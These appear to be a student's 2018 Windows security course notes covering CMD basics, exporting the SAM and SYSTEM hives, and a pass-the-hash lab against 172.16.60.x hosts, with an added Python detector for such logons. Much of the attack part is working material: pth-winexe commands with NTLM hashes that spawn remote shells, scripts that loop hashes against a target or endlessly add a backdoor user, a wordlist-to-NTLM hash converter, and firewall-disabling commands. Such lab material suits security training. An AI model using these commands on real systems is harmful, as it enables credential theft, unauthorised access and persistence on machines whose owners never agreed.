30.04.2018 WINDOWS Module Day-1
The focus of the module is working with CMD
General Info:
where the OS gets installed
OS ?
explorer?
authentication:
hash algorithms
the auth. process
lsass
C:\ = like root in linux
dir = like ls
cd = change directory
system32 = the apps there are owned by the system itself (NT AUTHORITY)
system32 = like /bin in linux
Commands:
C:\>.\calc
C:\>ping google.com
C:\> ping -n 10 google.com
C:\> ping -n 10 google.com -l 1500
C:\> .\whoami
C:\>ipconfig
C:\>netstat
Windows Firewall
In Win7
C:\>netsh firewall set opmode disable
C:\>netsh advfirewall ???
In Win10
##To turn off: netsh advfirewall set allprofiles state off
##To turn on: netsh advfirewall set allprofiles state on
##To check the status of Windows Firewall:
netsh advfirewall show allprofiles
Some protocols:
RDP
SMB
VNC
Ease of Access button on the login screen
C:\>utilman.exe
C:\Windows\System32\config = location of the SAM file, where the passwords are stored, and of SYSTEM
Exercises:
verify internet access / C:\>ping
verify what IP the PC has / C:\>ipconfig
show the users of the local system / C:\>net user
show the users of the system up to the domain / C:\>net user /domain
add a user / C:\>net user testdr test /add
privileges / C:\>net user testdr
change the password / C:\>net user testdr newpass
delete a user / C:\>net user testdr /delete
show the groups / C:\>net localgroup
add a user to a group / C:\>net localgroup administrators user /add
stuxnet ## type of attack
USB Rubber Ducky ## a type of USB that the PC recognizes as a keyboard
UAC = User Account Control ## the pop-up for run as
Disable UAC ?
Enable UAC ?
https://hashkiller.co.uk/ ## site for hash files
Bash Bunny ## USB tool, injects scripts, locked
LAN Turtle USB ## USB
##Export SAM and system file
reg save hklm\sam c:\sam
reg save hklm\system c:\system
## tool to open the SAM and SYSTEM files
pwdump system sam (run in the folder where the SAM and SYSTEM files are located)
#####################################################################################################
02.05
#####################################################################################################
04.05
#####################################################################################################
07.05.2018
with Win7
vector of the attack
pass the hash
1.
  1. make sure the admin exists and is enabled
  2. make sure the admin user has a password
  3. export the SAM and SYSTEM db and extract the admin's hash
2.
  1. check that SMB is open on the target PC
  2. check whether the target PC is in a domain or a workgroup,
     since the password and the hash work both in the domain and on the local machine
  3. identify a PtH tool, download it, analyze it
  4. with one of the PtH tools perform pass the hash and execute cmd
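Added example (not from the course notes) showing the defender's side of the steps above: a Python check over constructed Windows Security 4624 records that flags one source replaying a local account's NTLM credentials against several hosts within minutes, which is the trace the pass-the-hash exercise leaves in the targets' logs. Host names, users, addresses and the dict field names are assumptions; real events would be pulled from the Security log.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records shaped like event 4624 fields (hosts, users, IPs are made up).
FIELDS = ("time", "host", "event_id", "logon_type", "auth_pkg",
          "target_domain", "user", "src_ip")
RAW = [
    ("2018-05-09 10:00:01", "WS01", 4624, 3, "NTLM", "WS01", "Administrator", "172.16.60.50"),
    ("2018-05-09 10:00:02", "WS02", 4624, 3, "NTLM", "WS02", "Administrator", "172.16.60.50"),
    ("2018-05-09 10:00:04", "WS03", 4624, 3, "NTLM", "WS03", "Administrator", "172.16.60.50"),
    ("2018-05-09 10:00:05", "WS04", 4624, 3, "NTLM", "WS04", "Administrator", "172.16.60.50"),
    ("2018-05-09 10:01:00", "WS01", 4624, 3, "Kerberos", "LAB", "jdoe", "172.16.60.51"),
    ("2018-05-09 10:01:10", "WS02", 4624, 3, "Kerberos", "LAB", "jdoe", "172.16.60.51"),
    ("2018-05-09 10:01:20", "WS03", 4624, 3, "Kerberos", "LAB", "jdoe", "172.16.60.51"),
    ("2018-05-09 08:00:00", "WS01", 4624, 3, "NTLM", "WS01", "Administrator", "172.16.60.52"),
    ("2018-05-09 11:00:00", "WS02", 4624, 3, "NTLM", "WS02", "Administrator", "172.16.60.52"),
    ("2018-05-09 14:00:00", "WS03", 4624, 3, "NTLM", "WS03", "Administrator", "172.16.60.52"),
    ("2018-05-09 10:02:00", "WS05", 4624, 2, "NTLM", "WS05", "Administrator", "127.0.0.1"),
]
EVENTS = [dict(zip(FIELDS, r)) for r in RAW]

def is_local_ntlm_network_logon(e):
    """Successful network logon (Type 3) authenticated with NTLM using an
    account local to the target: for local accounts the event's target domain
    is the computer name rather than an AD domain."""
    return (e["event_id"] == 4624 and e["logon_type"] == 3
            and e["auth_pkg"] == "NTLM"
            and e["target_domain"].upper() == e["host"].upper())

def pth_sweeps(events, window=timedelta(minutes=5), min_hosts=3):
    """Return {(src_ip, user): sorted hosts} for sources whose local-account NTLM
    network logons reached >= min_hosts distinct hosts inside one `window`."""
    by_src = defaultdict(list)
    for e in filter(is_local_ntlm_network_logon, events):
        t = datetime.strptime(e["time"], "%Y-%m-%d %H:%M:%S")
        by_src[(e["src_ip"], e["user"])].append((t, e["host"]))
    hits = {}
    for key, logons in by_src.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                hits[key] = sorted({h for _, h in logons})
                break
    return hits

if __name__ == "__main__":
    for (ip, user), hosts in pth_sweeps(EVENTS).items():
        print(f"{ip} as {user}: NTLM logons to {', '.join(hosts)}")
```

Legitimate admin tooling also produces NTLM Type 3 logons, so a hit is a lead to investigate, not proof on its own.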
#####################################################################################################
9 May 2018
cd /pth-toolkit
172.16.60.64
Port 445
./pth-winexe -U WORKGROUP/Administrator%LM:NTLM //172.16.60.64 cmd
nano ntlmauth.py
import os
#import socket
#import sys
#from netaddr import IPNetwork
#import multiprocessing
#from multiprocessing.pool import ThreadPool

# try every hash in hash.txt, one per line, against the lab target
for i in open('hash.txt', 'r'):
    hash = i.rstrip()
    os.system('./pth-winexe -U WORKGROUP/Administrator%{} //172.16.60.64 cmd'.format(hash))

#ip = sys.argv[1]
#port = 445
#def connect(i):
#    # check whether TCP/445 answers on one address of the range
#    try:
#        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#        s.settimeout(1)
#        r = s.connect_ex((str(i), 445))
#        if r == 0:
#            os.system('./pth-winexe -U WORKGROUP/Administrator%LM:NTLM //172.16.60.64 cmd')
#            # or: print '{} TCP/445 OPEN'.format(i)
#    except:
#        pass
#def threading():
#    pool = ThreadPool(multiprocessing.cpu_count())
#    pool.map(connect, IPNetwork(sys.argv[1]))
#    pool.close()
#    pool.join()
#if __name__ == '__main__':
#    print ''
#    threading()
#    print ''
#    #connect()
python ntlmauth.py
python ntlmauth.py 172.16.60.1/24
LM: aad3b435b51404eeaad3b435b51404ee
./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 'net user q q /add'
or 'taskkill /F /IM cmd.exe'
cat fin.py
import time
import os
# repeat the command forever (the challenge from this session)
while True:
    os.system("./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 //172.16.60.73 'net user q q /add'")
    time.sleep(1)  # pause between attempts
Find a wordlist with the top 500 passwords and convert it to LM and NTLM hashes.
LM: aad3b435b51404eeaad3b435b51404ee
Converting a password to NTLM:
import hashlib, binascii
# NT hash = MD4 over the UTF-16LE encoding of the password
# (on newer Python builds hashlib's md4 needs the OpenSSL legacy provider)
hash = hashlib.new('md4', "password".encode('utf-16le')).digest()
print(binascii.hexlify(hash).decode())
import sys
import hashlib, binascii
# hash every line of the wordlist given as the first argument the same way
for i in open(sys.argv[1]):
    i = i.rstrip()
    hash = hashlib.new('md4', i.encode('utf-16le')).digest()
    print(binascii.hexlify(hash).decode())
python file.py wordlist.txt
Write a script in bash or another language that reads each of the passwords until it finds the right one and authenticates.
./pth-winexe -U WORKGROUP/Administrator%aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 //172.16.60.64 cmd
#####################################################################################################
11 May 2018
tasklist - lists running processes
start
taskkill /F /PID 3420
taskkill = kill and pkill
taskkill /F /IM cmd.exe - kills every cmd connection (last session's challenge)
query user - shows the logged-in users
tasklist
netstat -a
PowerShell - since cmd does not suit us
Payload
sudo msfconsole
use exploit …
taskkill.exe /F /PID 3420
Linux
migrate -N notepad.exe
The Process Explorer application
In Windows 7: enable the Administrator account, set a password for it, and provide the password
netsh advfirewall firewall add rule name="IP Block" dir=in interface=any action=block remoteip=<IP_Address>/32
#####################################################################################################
Challenge 1
  add 5 users
  2 of them should be administrators
  document changing the password, and how to change it when the password parameter is not shown
Challenge 2
  export SAM and SYSTEM
  try to read the hash values
  document it
Challenge 3
  modify Sticky Keys with an application that is not cmd
Challenge 4
  try to identify whether there is a process in Windows where logs are stored, and if so, how it is enabled
#####################################################################################################
WIN7 Disable/Enable SMB1 with PowerShell
## Disable:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
## Enable:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force
Disable/Enable SMB1 with Registry
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
0 = Disabled
1 = Enabled
Server 2012 and 2008
## Disable:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
## Enable:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 1 -Force